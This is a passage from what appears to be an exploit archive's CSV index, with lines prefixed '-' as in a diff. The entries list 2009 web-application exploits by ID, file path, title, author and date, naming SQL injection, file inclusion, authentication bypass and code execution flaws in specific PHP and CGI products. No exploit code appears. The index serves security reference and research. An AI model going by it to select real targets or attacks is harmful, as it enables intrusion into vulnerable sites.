-8929,exploits/php/webapps/8929.txt,"Splog 1.2 Beta - Multiple SQL Injections",2009-06-11,YEnH4ckEr,php,webapps, -8931,exploits/php/webapps/8931.txt,"TorrentVolve 1.4 - 'deleteTorrent' Delete Arbitrary File",2009-06-11,Br0ly,php,webapps, -8932,exploits/php/webapps/8932.txt,"yogurt 0.3 - Cross-Site Scripting / SQL Injection",2009-06-11,Br0ly,php,webapps, -8933,exploits/php/webapps/8933.php,"Sniggabo CMS - 'article.php?id' SQL Injection",2009-06-11,Lidloses_Auge,php,webapps, -8935,exploits/php/webapps/8935.txt,"Zip Store Chat 4.0/5.0 - Authentication Bypass",2009-06-12,ByALBAYX,php,webapps, -8936,exploits/php/webapps/8936.txt,"4Images 1.7.7 - Filter Bypass HTML Injection / Cross-Site Scripting",2009-06-12,Qabandi,php,webapps, -8937,exploits/php/webapps/8937.txt,"campus virtual-lms - Cross-Site Scripting / SQL Injection",2009-06-12,Yasión,php,webapps, -8939,exploits/php/webapps/8939.pl,"phpWebThings 1.5.2 - MD5 Hash Retrieve/File Disclosure",2009-06-12,StAkeR,php,webapps, -8941,exploits/php/webapps/8941.txt,"pivot 1.40.4-7 - Multiple Vulnerabilities",2009-06-12,intern0t,php,webapps, -8942,exploits/php/webapps/8942.txt,"tbdev 01-01-2008 - Multiple Vulnerabilities",2009-06-12,intern0t,php,webapps, -8943,exploits/php/webapps/8943.txt,"TransLucid 1.75 - Multiple Vulnerabilities",2009-06-12,intern0t,php,webapps, -8944,exploits/php/webapps/8944.txt,"Uebimiau Web-Mail 3.2.0-1.8 - Remote File / Overwrite",2009-06-12,GoLd_M,php,webapps, -8946,exploits/php/webapps/8946.txt,"Joomla! Component com_Projectfork 2.0.10 - Local File Inclusion",2009-06-15,ByALBAYX,php,webapps, -8947,exploits/php/webapps/8947.txt,"impleo music Collection 2.0 - SQL Injection / Cross-Site Scripting",2009-06-15,SirGod,php,webapps, -8948,exploits/php/webapps/8948.txt,"Mundi Mail 0.8.2 - 'top' Remote File Inclusion",2009-06-15,Br0ly,php,webapps, -8949,exploits/php/webapps/8949.txt,"SugarCRM 5.2.0e - Remote Code Execution",2009-06-15,USH,php,webapps, -8950,exploits/php/webapps/8950.txt,"formmail 1.92 - Multiple Vulnerabilities",2009-06-15,USH,php,webapps, -8951,exploits/php/webapps/8951.php,"DB Top Sites 1.0 - Remote Command Execution",2009-06-15,SirGod,php,webapps, -8952,exploits/php/webapps/8952.txt,"DB Top Sites 1.0 - 'index.php?u' Local File Inclusion",2009-06-15,SirGod,php,webapps, -8953,exploits/php/webapps/8953.txt,"elvin bts 1.2.0 - Multiple Vulnerabilities",2009-06-15,SirGod,php,webapps, -8954,exploits/php/webapps/8954.txt,"adaptweb 0.9.2 - Local File Inclusion / SQL Injection",2009-06-15,SirGod,php,webapps, -8956,exploits/php/webapps/8956.html,"Evernew Free Joke Script 1.2 - Remote Change Password",2009-06-15,Hakxer,php,webapps, -8958,exploits/php/webapps/8958.txt,"TorrentTrader Classic 1.09 - Multiple Vulnerabilities",2009-06-15,waraxe,php,webapps, -8959,exploits/php/webapps/8959.pl,"Joomla! Component com_iJoomla_rss - Blind SQL Injection",2009-06-15,"Mehmet Ince",php,webapps, -8961,exploits/php/webapps/8961.txt,"WordPress Plugin Photoracer 1.0 - 'id' SQL Injection",2009-06-15,Kacper,php,webapps, -8962,exploits/php/webapps/8962.txt,"PHPCollegeExchange 0.1.5c - 'listing_view.php?itemnr' SQL Injection",2009-06-15,SirGod,php,webapps, -8965,exploits/php/webapps/8965.txt,"vBulletin Radio and TV Player AddOn - HTML Injection",2009-06-15,d3v1l,php,webapps, -8966,exploits/php/webapps/8966.txt,"PHPortal 1 - 'topicler.php?id' SQL Injection",2009-06-15,"Mehmet Ince",php,webapps, -8967,exploits/php/webapps/8967.txt,"The Recipe Script 5 - Cross-Site Scripting",2009-06-15,"ThE g0bL!N",php,webapps, -8968,exploits/php/webapps/8968.txt,"Joomla! Component Jumi - 'fileid' Blind SQL Injection",2009-06-15,"Chip d3 bi0s",php,webapps, -8974,exploits/php/webapps/8974.txt,"XOOPS 2.3.3 - '.htaccess' Remote File Disclosure",2009-06-16,daath,php,webapps, -8975,exploits/php/webapps/8975.txt,"PHPFK 7.03 - 'page_bottom.php' Local File Inclusion",2009-06-17,ahmadbady,php,webapps, -8977,exploits/php/webapps/8977.txt,"TekBase All-in-One 3.1 - Multiple SQL Injections",2009-06-17,n3wb0ss,php,webapps, -8978,exploits/php/webapps/8978.txt,"Fuzzylime CMS 3.03a - Local Inclusion / Arbitrary File Corruption (PoC)",2009-06-17,StAkeR,php,webapps, -8979,exploits/php/webapps/8979.txt,"FretsWeb 1.2 - Multiple Local File Inclusions",2009-06-17,YEnH4ckEr,php,webapps, -8980,exploits/php/webapps/8980.py,"FretsWeb 1.2 - 'name' Blind SQL Injection",2009-06-17,YEnH4ckEr,php,webapps, -8981,exploits/php/webapps/8981.txt,"PHPortal 1.0 - Insecure Cookie Handling",2009-06-17,KnocKout,php,webapps, -8984,exploits/php/webapps/8984.txt,"CMS buzz - Cross-Site Scripting / Password Change / HTML Injection",2009-06-18,"ThE g0bL!N",php,webapps, -8987,exploits/cgi/webapps/8987.txt,"MIDAS 1.43 - (Authentication Bypass) Insecure Cookie Handling",2009-06-22,HxH,cgi,webapps, -8988,exploits/php/webapps/8988.txt,"pc4 Uploader 10.0 - Remote File Disclosure",2009-06-22,Qabandi,php,webapps, -8990,exploits/php/webapps/8990.txt,"phpDatingClub 3.7 - SQL Injection / Cross-Site Scripting Injection",2009-06-22,"ThE g0bL!N",php,webapps, -8992,exploits/php/webapps/8992.php,"phpMyAdmin - 'pmaPWN!' Code Injection / Remote Code Execution",2009-06-22,"Hacking Expose!",php,webapps, -8993,exploits/php/webapps/8993.txt,"elgg - Cross-Site Scripting / Cross-Site Request Forgery / Change Password",2009-06-22,lorddemon,php,webapps, -8994,exploits/php/webapps/8994.txt,"AWScripts Gallery Search Engine 1.x - Insecure Cookie",2009-06-22,TiGeR-Dz,php,webapps, -8995,exploits/php/webapps/8995.txt,"Campsite 3.3.0 RC1 - Multiple Remote File Inclusions",2009-06-22,CraCkEr,php,webapps, -8996,exploits/php/webapps/8996.txt,"Gravy Media Photo Host 1.0.8 - Local File Disclosure",2009-06-22,Lo$er,php,webapps, -8997,exploits/php/webapps/8997.txt,"Kasseler CMS - File Disclosure / Cross-Site Scripting",2009-06-22,S(r1pt,php,webapps, -8998,exploits/php/webapps/8998.txt,"SourceBans 1.4.2 - Arbitrary Change Admin Email",2009-06-22,"Mr. Anonymous",php,webapps, -8999,exploits/php/webapps/8999.txt,"Joomla! Component com_tickets 2.1 - 'id' SQL Injection",2009-06-22,"Chip d3 bi0s",php,webapps, -9000,exploits/php/webapps/9000.txt,"RS-CMS 2.1 - 'key' SQL Injection",2009-06-22,Mr.tro0oqy,php,webapps, -9001,exploits/php/webapps/9001.php,"MyBB 1.4.6 - Remote Code Execution",2009-06-22,The:Paradox,php,webapps, -9004,exploits/php/webapps/9004.txt,"Zen Cart 1.3.8 - Remote Code Execution",2009-06-23,BlackH,php,webapps, -9005,exploits/php/webapps/9005.py,"Zen Cart 1.3.8 - SQL Execution",2009-06-23,BlackH,php,webapps, -9008,exploits/php/webapps/9008.txt,"phpCollegeExchange 0.1.5c - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting",2009-06-23,CraCkEr,php,webapps, -9009,exploits/php/webapps/9009.txt,"BASE 1.2.4 - (Authentication Bypass) Insecure Cookie Handling",2009-06-24,"Tim Medin",php,webapps, -9010,exploits/php/webapps/9010.txt,"Glossword 1.8.11 - 'index.php?x' Local File Inclusion",2009-06-24,t0fx,php,webapps, -9011,exploits/php/webapps/9011.txt,"Joomla! Component com_pinboard - Arbitrary File Upload",2009-06-24,ViRuSMaN,php,webapps, -9012,exploits/php/webapps/9012.txt,"Tribiq CMS 5.0.12c - Cross-Site Scripting / Local File Inclusion",2009-06-24,CraCkEr,php,webapps, -9014,exploits/php/webapps/9014.txt,"PHPEcho CMS 2.0-rc3 - 'forum' Cross-Site Scripting Cookie Stealing / Blind SQL Injection",2009-06-24,JosS,php,webapps, -9015,exploits/php/webapps/9015.txt,"LightOpenCMS 0.1 - 'smarty.php?cwd' Local File Inclusion",2009-06-24,JosS,php,webapps, -9016,exploits/php/webapps/9016.txt,"Joomla! Component com_amocourse - 'catid' SQL Injection",2009-06-24,"Chip d3 bi0s",php,webapps, -9017,exploits/php/webapps/9017.txt,"Joomla! Component com_pinboard - 'task' SQL Injection",2009-06-25,Stack,php,webapps, -9018,exploits/php/webapps/9018.txt,"MyFusion 6b - settings[locale] Local File Inclusion",2009-06-25,CraCkEr,php,webapps, -9019,exploits/php/webapps/9019.txt,"AlumniServer 1.0.1 - Authentication Bypass",2009-06-25,YEnH4ckEr,php,webapps, -9020,exploits/php/webapps/9020.py,"AlumniServer 1.0.1 - 'resetpwemail' Blind SQL Injection",2009-06-25,YEnH4ckEr,php,webapps, -9021,exploits/php/webapps/9021.txt,"MD-Pro 1.083.x - Survey Module 'pollID' Blind SQL Injection",2009-06-25,XaDoS,php,webapps, -9022,exploits/php/webapps/9022.txt,"Virtue Online Test Generator - Authentication Bypass / SQL Injection / Cross-Site Scripting",2009-06-26,HxH,php,webapps, -9023,exploits/php/webapps/9023.txt,"PHP-Address Book 4.0.x - Multiple SQL Injections",2009-06-26,YEnH4ckEr,php,webapps, -9024,exploits/php/webapps/9024.txt,"ForumPal FE 1.1 - Authentication Bypass",2009-06-26,"ThE g0bL!N",php,webapps, -9025,exploits/php/webapps/9025.txt,"Mega File Manager 1.0 - 'index.php' Local File Inclusion",2009-06-26,SirGod,php,webapps, -9026,exploits/php/webapps/9026.txt,"WHOISCART - Authentication Bypass / Information Disclosure",2009-06-29,SecurityRules,php,webapps, -9027,exploits/php/webapps/9027.txt,"Messages Library 2.0 - 'cat.php?CatID' SQL Injection",2009-06-29,SecurityRules,php,webapps, -9028,exploits/php/webapps/9028.txt,"Joomla! Component com_php - 'id' Blind SQL Injection",2009-06-29,"Chip d3 bi0s",php,webapps, -9030,exploits/php/webapps/9030.txt,"Joomla! Component com_K2 -q 1.0.1b - 'category' SQL Injection",2009-06-29,"Chip d3 bi0s",php,webapps, -9032,exploits/php/webapps/9032.txt,"osTicket 1.6 RC4 - Admin Login Blind SQL Injection",2009-06-29,"Adam Baldwin",php,webapps, -9035,exploits/php/webapps/9035.txt,"Almnzm - 'COOKIE: customer' SQL Injection",2009-06-29,Qabandi,php,webapps, -9036,exploits/php/webapps/9036.txt,"PHP-Sugar 0.80 - 'index.php?t' Local File Inclusion",2009-06-29,ahmadbady,php,webapps, -9037,exploits/php/webapps/9037.txt,"Clicknet CMS 2.1 - 'side' Arbitrary File Disclosure",2009-06-29,"ThE g0bL!N",php,webapps, -9040,exploits/php/webapps/9040.txt,"Joomla! Component com_bookflip - 'book_id' SQL Injection",2009-06-29,boom3rang,php,webapps, -9041,exploits/php/webapps/9041.txt,"Audio Article Directory - 'file' Remote File Disclosure",2009-06-29,"ThE g0bL!N",php,webapps, -9042,exploits/php/webapps/9042.pl,"NEWSolved 1.1.6 - 'login grabber' Multiple SQL Injections",2009-06-29,jmp-esp,php,webapps, -9043,exploits/php/webapps/9043.txt,"WordPress Plugin DM Albums 1.9.2 - Remote File Inclusion",2009-06-29,Septemb0x,php,webapps, -9044,exploits/php/webapps/9044.txt,"dm FileManager 3.9.4 - Remote File Inclusion",2009-06-29,Septemb0x,php,webapps, -9048,exploits/php/webapps/9048.txt,"WordPress Plugin DM Albums 1.9.2 - Remote File Disclosure",2009-06-30,Stack,php,webapps, -9049,exploits/php/webapps/9049.txt,"DM FileManager 3.9.4 - Remote File Disclosure",2009-06-30,Stack,php,webapps, -9050,exploits/php/webapps/9050.pl,"SMF Mod Member Awards 1.0.2 - Blind SQL Injection",2009-06-30,eLwaux,php,webapps, -9051,exploits/php/webapps/9051.txt,"jax formmailer 3.0.0 - Remote File Inclusion",2009-06-30,ahmadbady,php,webapps, -9052,exploits/php/webapps/9052.txt,"BigACE 2.6 - 'cmd' Local File Inclusion",2009-06-30,CWD@rBe,php,webapps, -9053,exploits/php/webapps/9053.txt,"phpMyBlockchecker 1.0.0055 - Insecure Cookie Handling",2009-06-30,SirGod,php,webapps, -9054,exploits/php/webapps/9054.txt,"WordPress Plugin Related Sites 2.1 - Blind SQL Injection",2009-06-30,eLwaux,php,webapps, -9055,exploits/php/webapps/9055.pl,"PunBB Affiliates Mod 1.1 - Blind SQL Injection",2009-06-30,Dante90,php,webapps, -9056,exploits/php/webapps/9056.txt,"MDPro Module CWGuestBook 2.1 - SQL Injection",2009-06-30,Dante90,php,webapps, -9057,exploits/php/webapps/9057.txt,"tsep 0.942.02 - Multiple Vulnerabilities",2009-06-30,eLwaux,php,webapps, -9058,exploits/php/webapps/9058.pl,"PunBB Extension Vote For Us 1.0.1 - Blind SQL Injection",2009-06-30,Dante90,php,webapps, -9059,exploits/php/webapps/9059.html,"Messages Library 2.0 - Arbitrary Administrator Account",2009-06-30,"ThE g0bL!N",php,webapps, -9062,exploits/php/webapps/9062.txt,"Messages Library 2.0 - Arbitrary Delete Message",2009-07-01,Stack,php,webapps, -9063,exploits/php/webapps/9063.txt,"Messages Library 2.0 - Insecure Cookie Handling",2009-07-01,Stack,php,webapps, -9068,exploits/php/webapps/9068.txt,"kervinet forum 1.1 - Multiple Vulnerabilities",2009-07-01,eLwaux,php,webapps, -9069,exploits/php/webapps/9069.txt,"CMS chainuk 1.2 - Multiple Vulnerabilities",2009-07-01,eLwaux,php,webapps, -9073,exploits/php/webapps/9073.php,"YourTube 2.0 - Arbitrary Database Disclosure",2009-07-02,"Security Code Team",php,webapps, -9074,exploits/cgi/webapps/9074.txt,"Sourcefire 3D Sensor & Defense Center 4.8.x - Privilege Escalation",2009-07-02,"Gregory Duchemin",cgi,webapps, -9075,exploits/php/webapps/9075.txt,"AdminLog 0.5 - 'valid_login' Authentication Bypass",2009-07-02,SirGod,php,webapps, -9076,exploits/php/webapps/9076.php,"Almnzm 2.0 - Blind SQL Injection",2009-07-02,Qabandi,php,webapps, -9077,exploits/php/webapps/9077.txt,"ConPresso 3.4.8 - 'detail.php' Blind SQL Injection",2009-07-02,tmh,php,webapps, -9079,exploits/php/webapps/9079.txt,"Opial 1.0 - Authentication Bypass",2009-07-02,Moudi,php,webapps, -9080,exploits/php/webapps/9080.txt,"Opial 1.0 - 'albumID' SQL Injection",2009-07-02,"ThE g0bL!N",php,webapps, -9081,exploits/php/webapps/9081.txt,"Rentventory - Multiple SQL Injections",2009-07-02,Moudi,php,webapps, -9086,exploits/php/webapps/9086.txt,"MRCGIGUY Thumbnail Gallery Post 1b - Arbitrary File Upload",2009-07-09,"ThE g0bL!N",php,webapps, -9087,exploits/php/webapps/9087.php,"Nwahy Dir 2.1 - Arbitrary Change Admin Password",2009-07-09,rEcruit,php,webapps, -9088,exploits/php/webapps/9088.txt,"Glossword 1.8.11 - Arbitrary Uninstall / Install",2009-07-09,Evil-Cod3r,php,webapps, -9089,exploits/php/webapps/9089.txt,"ClearContent - '/image.php?url' Local/Remote File Inclusion",2009-07-09,MizoZ,php,webapps, -9091,exploits/php/webapps/9091.php,"Mlffat 2.2 - Blind SQL Injection",2009-07-09,Qabandi,php,webapps, -9092,exploits/php/webapps/9092.txt,"webasyst shop-script - Blind SQL Injection / Cross-Site Scripting",2009-07-09,Vrs-hCk,php,webapps, -9094,exploits/php/webapps/9094.txt,"EasyVillaRentalSite - 'id' SQL Injection",2009-07-09,BazOka-HaCkEr,php,webapps, -9095,exploits/php/webapps/9095.txt,"TalkBack 2.3.14 - Multiple Vulnerabilities",2009-07-09,JIKO,php,webapps, -9098,exploits/php/webapps/9098.txt,"Siteframe CMS 3.2.x - SQL Injection / phpinfo()",2009-07-09,NoGe,php,webapps, -9099,exploits/php/webapps/9099.pl,"Universe CMS 1.0.6 - 'vnews.php?id' SQL Injection",2009-07-09,Mr.tro0oqy,php,webapps, -9101,exploits/php/webapps/9101.txt,"phpbms 0.96 - Multiple Vulnerabilities",2009-07-10,eLwaux,php,webapps, -9103,exploits/php/webapps/9103.txt,"gencms 2006 - Multiple Vulnerabilities",2009-07-10,eLwaux,php,webapps, -9105,exploits/php/webapps/9105.txt,"MyMsg 1.0.3 - 'uid' SQL Injection",2009-07-10,Monster-Dz,php,webapps, -9107,exploits/php/webapps/9107.txt,"Phenotype CMS 2.8 - 'login.php?user' Blind SQL Injection",2009-07-10,"Khashayar Fereidani",php,webapps, -9109,exploits/php/webapps/9109.txt,"ToyLog 0.1 - SQL Injection / Remote Code Execution",2009-07-10,darkjoker,php,webapps, -9110,exploits/php/webapps/9110.txt,"WordPress Core / MU / Plugins - '/admin.php' Privileges Unchecked / Multiple Information Disclosures",2009-07-10,"Core Security",php,webapps, -9111,exploits/php/webapps/9111.txt,"Jobbr 2.2.7 - Multiple SQL Injections",2009-07-10,Moudi,php,webapps, -9112,exploits/php/webapps/9112.txt,"Joomla! Component com_propertylab - 'auction_id' SQL Injection",2009-07-10,"Chip d3 bi0s",php,webapps, -9115,exploits/php/webapps/9115.txt,"Digitaldesign CMS 0.1 - Remote Database Disclosure",2009-07-10,darkjoker,php,webapps, -9118,exploits/php/webapps/9118.txt,"ebay clone 2009 - Cross-Site Scripting / Blind SQL Injection",2009-07-10,Moudi,php,webapps, -9119,exploits/php/webapps/9119.txt,"LionWiki - 'index.php' Local File Inclusion",2009-07-10,MoDaMeR,php,webapps, -9121,exploits/php/webapps/9121.php,"Morcego CMS 1.7.6 - Blind SQL Injection",2009-07-10,darkjoker,php,webapps, -9122,exploits/php/webapps/9122.txt,"Opial 1.0 - Arbitrary File Upload / Cross-Site Scripting / SQL Injection",2009-07-11,LMaster,php,webapps, -9125,exploits/php/webapps/9125.txt,"Ebay Clone 2009 - Multiple SQL Injections",2009-07-11,MizoZ,php,webapps, -9126,exploits/php/webapps/9126.txt,"Joomla! Component com_category - 'catid' SQL Injection",2009-07-11,Prince_Pwn3r,php,webapps, -9127,exploits/php/webapps/9127.txt,"d.net CMS - Arbitrary Reinstall/Blind SQL Injection",2009-07-11,darkjoker,php,webapps, -9129,exploits/php/webapps/9129.txt,"censura 1.16.04 - Blind SQL Injection / Cross-Site Scripting",2009-07-12,Vrs-hCk,php,webapps, -9130,exploits/php/webapps/9130.txt,"PHP AdminPanel Free 1.0.5 - Remote File Disclosure",2009-07-12,"Khashayar Fereidani",php,webapps, -9132,exploits/php/webapps/9132.py,"RunCMS 1.6.3 - Remote Shell Injection",2009-07-13,StAkeR,php,webapps, -9138,exploits/php/webapps/9138.txt,"onepound shop 1.x - 'products.php' SQL Injection",2009-07-13,Affix,php,webapps, -9140,exploits/cgi/webapps/9140.txt,"DJ Calendar - 'DJcalendar.cgi TEMPLATE' File Disclosure",2009-07-14,cibbao,cgi,webapps, -9144,exploits/php/webapps/9144.txt,"Mobilelib Gold 3.0 - Local File Disclosure",2009-07-14,Qabandi,php,webapps, -9145,exploits/php/webapps/9145.php,"Traidnt UP 2.0 - Blind SQL Injection",2009-07-14,Qabandi,php,webapps, -9150,exploits/php/webapps/9150.txt,"WordPress Plugin My Category Order 2.8 - SQL Injection",2009-07-15,"Manh Luat",php,webapps, -9151,exploits/php/webapps/9151.txt,"ILIAS Lms 3.9.9/3.10.7 - Arbitrary Edition / Information Disclosure",2009-07-15,YEnH4ckEr,php,webapps, -9153,exploits/php/webapps/9153.txt,"Admin News Tools 2.5 - 'fichier' Remote File Disclosure",2009-07-15,Securitylab.ir,php,webapps, -9154,exploits/php/webapps/9154.js,"ZenPhoto 1.2.5 - Completely Blind SQL Injection",2009-07-15,petros,php,webapps, -9155,exploits/php/webapps/9155.txt,"PHPGenealogy 2.0 - 'DataDirectory' Remote File Inclusion",2009-07-15,"Khashayar Fereidani",php,webapps, -9156,exploits/php/webapps/9156.py,"Greenwood Content Manager 0.3.2 - Local File Inclusion",2009-07-15,"Khashayar Fereidani",php,webapps, -9159,exploits/php/webapps/9159.php,"Infinity 2.0.5 - Arbitrary Create Admin",2009-07-15,Qabandi,php,webapps, -9161,exploits/php/webapps/9161.txt,"Admin News Tools - Remote Contents Change",2009-07-15,Securitylab.ir,php,webapps, -9162,exploits/php/webapps/9162.txt,"WebLeague 2.2.0 - 'profile.php' SQL Injection",2009-07-15,Arka69,php,webapps, -9164,exploits/php/webapps/9164.txt,"webLeague 2.2.0 - 'install.php' Remote Change Password",2009-07-16,TiGeR-Dz,php,webapps, -9165,exploits/php/webapps/9165.pl,"webLeague 2.2.0 - Authentication Bypass",2009-07-16,ka0x,php,webapps, -9166,exploits/php/webapps/9166.txt,"ZenPhoto Gallery 1.2.5 - Admin Password Reset (Cross-Site Request Forgery)",2009-07-16,petros,php,webapps, -9171,exploits/php/webapps/9171.txt,"VS PANEL 7.5.5 - 'results.php?Cat_ID' SQL Injection",2009-07-16,C0D3R-Dz,php,webapps, -9174,exploits/php/webapps/9174.txt,"PHP Live! 3.2.1/2 - 'x' Blind SQL Injection",2009-07-16,boom3rang,php,webapps, -9176,exploits/php/webapps/9176.txt,"dB Masters MultiMedia's Content Manager 4.5 - SQL Injection",2009-07-16,NoGe,php,webapps, -9179,exploits/php/webapps/9179.txt,"Super Simple Blog Script 2.5.4 - Local File Inclusion",2009-07-17,JIKO,php,webapps, -9180,exploits/php/webapps/9180.txt,"Super Simple Blog Script 2.5.4 - 'entry' SQL Injection",2009-07-17,JIKO,php,webapps, -9182,exploits/php/webapps/9182.txt,"AJOX Poll - 'managepoll.php' Authentication Bypass",2009-07-17,SirGod,php,webapps, -9183,exploits/php/webapps/9183.txt,"Battle Blog 1.25 - Authentication Bypass / SQL Injection / HTML Injection",2009-07-17,$qL_DoCt0r,php,webapps, -9184,exploits/php/webapps/9184.txt,"Ger Versluis 2000 5.5 24 - 'SITE_fiche.php' SQL Injection",2009-07-17,DeCo017,php,webapps, -9185,exploits/php/webapps/9185.txt,"good/bad vote - Cross-Site Scripting / Local File Inclusion",2009-07-17,Moudi,php,webapps, -9187,exploits/php/webapps/9187.txt,"Joomla! Component Jobline 1.3.1 - Blind SQL Injection",2009-07-17,ManhLuat93,php,webapps, -9193,exploits/php/webapps/9193.pl,"WebVision 2.1 - 'news.php?n' SQL Injection",2009-07-17,Mr.tro0oqy,php,webapps, -9194,exploits/php/webapps/9194.txt,"radbids gold 4.0 - Multiple Vulnerabilities",2009-07-17,Moudi,php,webapps, -9195,exploits/php/webapps/9195.txt,"radlance gold 7.5 - Multiple Vulnerabilities",2009-07-17,Moudi,php,webapps, -9196,exploits/php/webapps/9196.txt,"radnics gold 5.0 - Multiple Vulnerabilities",2009-07-17,Moudi,php,webapps, -9202,exploits/php/webapps/9202.txt,"Silentum Guestbook 2.0.2 - 'silentum_Guestbook.php' SQL Injection",2009-07-20,Bgh7,php,webapps, -9203,exploits/php/webapps/9203.txt,"Netrix CMS 1.0 - Authentication Bypass",2009-07-20,Mr.tro0oqy,php,webapps, -9204,exploits/php/webapps/9204.txt,"MiniCWB 2.3.0 - 'lang' Remote File Inclusion",2009-07-20,NoGe,php,webapps, -9205,exploits/php/webapps/9205.txt,"mcshoutbox 1.1 - SQL Injection / Cross-Site Scripting / shell",2009-07-20,SirGod,php,webapps, -9211,exploits/php/webapps/9211.txt,"Alibaba-clone CMS - SQL Injection / Blind SQL Injection",2009-07-20,"599eme Man",php,webapps, -9217,exploits/php/webapps/9217.txt,"E-Xoopport 3.1 Module MyAnnonces - 'lid' SQL Injection",2009-07-20,Vrs-hCk,php,webapps, -9219,exploits/php/webapps/9219.txt,"powerUpload 2.4 - (Authentication Bypass) Insecure Cookie Handling",2009-07-20,InjEctOr5,php,webapps, -9225,exploits/php/webapps/9225.txt,"AnotherPHPBook (APB) 1.3.0 - Authentication Bypass",2009-07-21,n3w7u,php,webapps, -9226,exploits/php/webapps/9226.txt,"phpDirectorySource 1.0 - Cross-Site Scripting / SQL Injection",2009-07-21,Moudi,php,webapps, -9227,exploits/php/webapps/9227.txt,"Meta Search Engine Script - 'url' Local File Disclosure",2009-07-21,Moudi,php,webapps, -9231,exploits/php/webapps/9231.txt,"Phorum 5.2.11 - Persistent Cross-Site Scripting",2009-07-22,Crashfr,php,webapps, -9235,exploits/php/webapps/9235.php,"e107 Plugin my_gallery 2.4.1 - 'readfile()' Local File Disclosure",2009-07-23,NoGe,php,webapps, -9236,exploits/php/webapps/9236.txt,"Groone's GLink ORGanizer 2.1 - 'cat' Blind SQL Injection",2009-07-23,"599eme Man",php,webapps, -9237,exploits/php/webapps/9237.txt,"AWCM 2.1 - Local File Inclusion / Authentication Bypass",2009-07-23,SwEET-DeViL,php,webapps, -9238,exploits/php/webapps/9238.txt,"Joomla! Component com_Joomlaoads - 'packageId' SQL Injection",2009-07-23,Mr.tro0oqy,php,webapps, -9239,exploits/php/webapps/9239.txt,"PHP Melody 1.5.3 - Arbitrary File Upload Injection",2009-07-23,"Chip d3 bi0s",php,webapps, -9243,exploits/php/webapps/9243.txt,"Million-Dollar Pixel Ads Platinum - SQL Injection / Cross-Site Scripting",2009-07-24,Moudi,php,webapps, -9244,exploits/php/webapps/9244.txt,"Joomla! Extension UIajaxIM 1.1 - JavaScript Execution",2009-07-24,"599eme Man",php,webapps, -9246,exploits/php/webapps/9246.txt,"Basilic 1.5.13 - 'index.php?idAuthor' SQL Injection",2009-07-24,NoGe,php,webapps, -9248,exploits/php/webapps/9248.txt,"SaphpLesson 4.0 - Authentication Bypass",2009-07-24,SwEET-DeViL,php,webapps, -9249,exploits/php/webapps/9249.txt,"XOOPS Celepar Module Qas - 'codigo' SQL Injection",2009-07-24,s4r4d0,php,webapps, -9250,exploits/php/webapps/9250.sh,"WordPress 2.8.1 - 'url' Cross-Site Scripting",2009-07-24,superfreakaz0rz,php,webapps, -9251,exploits/php/webapps/9251.txt,"Deonixscripts Templates Management 1.3 - SQL Injection",2009-07-24,d3b4g,php,webapps, -9252,exploits/php/webapps/9252.txt,"Scripteen Free Image Hosting Script 2.3 - SQL Injection",2009-07-24,Coksnuss,php,webapps, -9254,exploits/php/webapps/9254.txt,"PHP Live! 3.2.2 - 'questid' SQL Injection (2)",2009-07-24,skys,php,webapps, -9255,exploits/php/webapps/9255.txt,"Clip Bucket 1.7.1 - Insecure Cookie Handling",2009-07-24,Qabandi,php,webapps, -9256,exploits/php/webapps/9256.txt,"Scripteen Free Image Hosting Script 2.3 - Insecure Cookie Handling",2009-07-24,Qabandi,php,webapps, -9257,exploits/php/webapps/9257.php,"Pixaria Gallery 2.3.5 - 'file' Remote File Disclosure",2009-07-24,Qabandi,php,webapps, -9258,exploits/php/webapps/9258.txt,"Joomla! Component Almond Classifieds com_aclassf 7.5 - Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps, -9259,exploits/php/webapps/9259.txt,"almond Classifieds ads - Blind SQL Injection / Cross-Site Scripting",2009-07-27,Moudi,php,webapps, -9260,exploits/php/webapps/9260.txt,"skadate dating - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting",2009-07-27,Moudi,php,webapps, -9261,exploits/php/webapps/9261.txt,"XOOPS Celepar Module Qas - Blind SQL Injection / Cross-Site Scripting",2009-07-27,Moudi,php,webapps, -9262,exploits/php/webapps/9262.txt,"garagesalesjunkie - SQL Injection / Cross-Site Scripting",2009-07-27,Moudi,php,webapps, -9263,exploits/php/webapps/9263.txt,"URA 3.0 - 'cat' SQL Injection",2009-07-27,"Chip d3 bi0s",php,webapps, -9266,exploits/php/webapps/9266.txt,"iwiccle 1.01 - Local File Inclusion / SQL Injection",2009-07-27,SirGod,php,webapps, -9267,exploits/php/webapps/9267.txt,"VS PANEL 7.5.5 - 'Cat_ID' SQL Injection",2009-07-27,octopos,php,webapps, -9269,exploits/php/webapps/9269.txt,"PHP Paid 4 Mail Script - 'home.php' Remote File Inclusion",2009-07-27,int_main();,php,webapps, -9270,exploits/php/webapps/9270.txt,"Super Mod System 3.0 - 's' SQL Injection",2009-07-27,MizoZ,php,webapps, -9271,exploits/php/webapps/9271.txt,"Inout Adserver - 'id' SQL Injection",2009-07-27,boom3rang,php,webapps, -9273,exploits/php/webapps/9273.php,"Allomani Mobile 2.5 - Blind SQL Injection",2009-07-27,Qabandi,php,webapps, -9274,exploits/php/webapps/9274.php,"Allomani Songs & Clips 2.7.0 - Blind SQL Injection",2009-07-27,Qabandi,php,webapps, -9275,exploits/php/webapps/9275.php,"Allomani Movies & Clips 2.7.0 - Blind SQL Injection",2009-07-27,Qabandi,php,webapps, -9276,exploits/php/webapps/9276.txt,"Joomla! Component IXXO Cart! Standalone and - SQL Injection",2009-07-27,sm0k3,php,webapps, -9279,exploits/php/webapps/9279.pl,"PunBB Automatic Image Upload 1.3.5 - SQL Injection",2009-07-27,Dante90,php,webapps, -9280,exploits/php/webapps/9280.pl,"PunBB Automatic Image Upload 1.3.5 - Arbitrary File Delete",2009-07-27,Dante90,php,webapps, -9281,exploits/php/webapps/9281.txt,"Limny 1.01 - Authentication Bypass",2009-07-27,SirGod,php,webapps, -9282,exploits/php/webapps/9282.txt,"Magician Blog 1.0 - 'ids' SQL Injection",2009-07-27,Evil-Cod3r,php,webapps, -9283,exploits/php/webapps/9283.txt,"Magician Blog 1.0 - Authentication Bypass",2009-07-27,Evil-Cod3r,php,webapps, -9284,exploits/php/webapps/9284.txt,"SerWeb 2.1.0-dev1 2009-07-02 - Multiple Remote File Inclusions",2009-07-27,GoLd_M,php,webapps, -9287,exploits/php/webapps/9287.txt,"PHP Paid 4 Mail Script - 'paidbanner.php?ID' SQL Injection",2009-07-28,"ThE g0bL!N",php,webapps, -9288,exploits/php/webapps/9288.txt,"phpArcadeScript 4.0 - 